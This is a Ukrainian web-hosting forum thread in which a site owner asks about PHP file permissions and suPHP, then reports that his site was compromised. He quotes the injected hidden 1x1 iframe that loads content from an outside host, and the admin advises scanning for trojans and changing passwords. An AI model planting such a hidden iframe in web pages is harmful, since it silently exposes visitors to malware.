FORUM.TOPUA.NET

[BIBLOS]

Поясніть мені будь ласка, як може бути що права на файл виставлено 644, а запустивши РНР-шний скріпт той здійснив в нього запис!?!?!

Дякую

[Kyrya]

Таке може бути, якщо скрипт запускався з правами власника. Дивіться скріншот. У того файлу права 644.

[BIBLOS]

Скрипт запускався без прав ВЛАСНИКА!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Це точно!- я ж настроївся на глюк, а тут все пішло!!!

[Kyrya]

[BIBLOS]

скрипт закинув через ФТП
Закрив, виставив права 644
Тоді через http запустив скрипт встановлення - все пішло запсало, створило новий файл. Я ж через http не авторизувався,
отже скрипт сам без всяких прав створив файлик і записав його!
Як?

[Дмитро]

Пошукайте у гуглі про SuPHP

Це те, що мають мати всі хостери заради безпеки користувачів (але нажаль, дуже мало хто переймається безпекою).

[BIBLOS]

Дякую за відповідь. Пошукав, почитав.
Та я нічого не знаю за механізм, і в неті теж не описується, тільки констатація що це і для чого.
Я так зрозумів це модуль який виконує скрипт з правами власника, але ж тоді можна написати код якого небудь двигунця, відкрити доступ до закачки, і "лазити" по чужих сайтах використовуючи функції suPHP?!

[BIBLOS]

Ще потрібна консультація, чи то відповідь:

Появився на сайті в коді такий собі
...http://leohin.com/.....

Це справа рук Адміна чи "мене Хакнули"?
Дякую!?!?!?!?!

[Kyrya]

Де у коді? Я головну завантажив - нічого немає.

[BIBLOS]

СОРІ! Я щойно закинув оновлення!!!!
Забувся, прошу вибачення, але наведений код СПРАВДІ ТАМ був.
Я це замітив по зміні розміру Контрольної копії і на сайті, а після -в модзілі заблоковано було ЯВА, воно мене "обізвало", я зразу закачав і був в шоці, але подумав -можливо це хостери - але ваша відповідь мене насторожує - ЯК!?!?!?!
>>
Привіт!
Подивіться вихідний текст завантаженої сторінки!!!!!!!
там таке
<iframe src="http://leohin.com/diamond/i/index.php?out=2222" width=1 height=1 style="visibility: hidden"></iframe>

Я фреймів не люблю в принципі, і користуюсь сам особисо на 0 %, тому коду такого НЕ ВСТАВЛЯВ ні звідки!!!
???

[Дмитро]

Перевірте ваш ПК на наявність троянів...

[BIBLOS]

2 компютери з 3 перевірені...поки чисто...

Але тепер ще один прикол (його теж раніше не було)
Модзілка показує що заблокований скрипт "about:blank" при загрузці сторінок BIBLOS?

[Дмитро]

Поясніть мені, яке я маю до цього відношення? Дуже прошу самотужки розбиратись з тим, що ви встановлюєте на вашому акаунті.

Змініть паролі, видаліть троянів. Якщо є проблема з сервером — буду радий допомогти, але проблеми з сервером немає.

Дякую.

[BIBLOS]

Прошу не ображатись
Я справді таких випадків не мав! -на третьому компі були Трояни
Буду знати і постараюсь більше не турбувати з такого приводу

Дякую

[BIBLOS]

Ну ось? Машина чиста, перевірив 5 різними прогами. Більше на сайт не ходив.Я змінив пароль, витер куки і нічого більше не робив.
Пройшло 2 дні -
Прошу загрузити титул - http://www.BIBLOS.org.ua/
там прогружається Ява з ІР- 58.....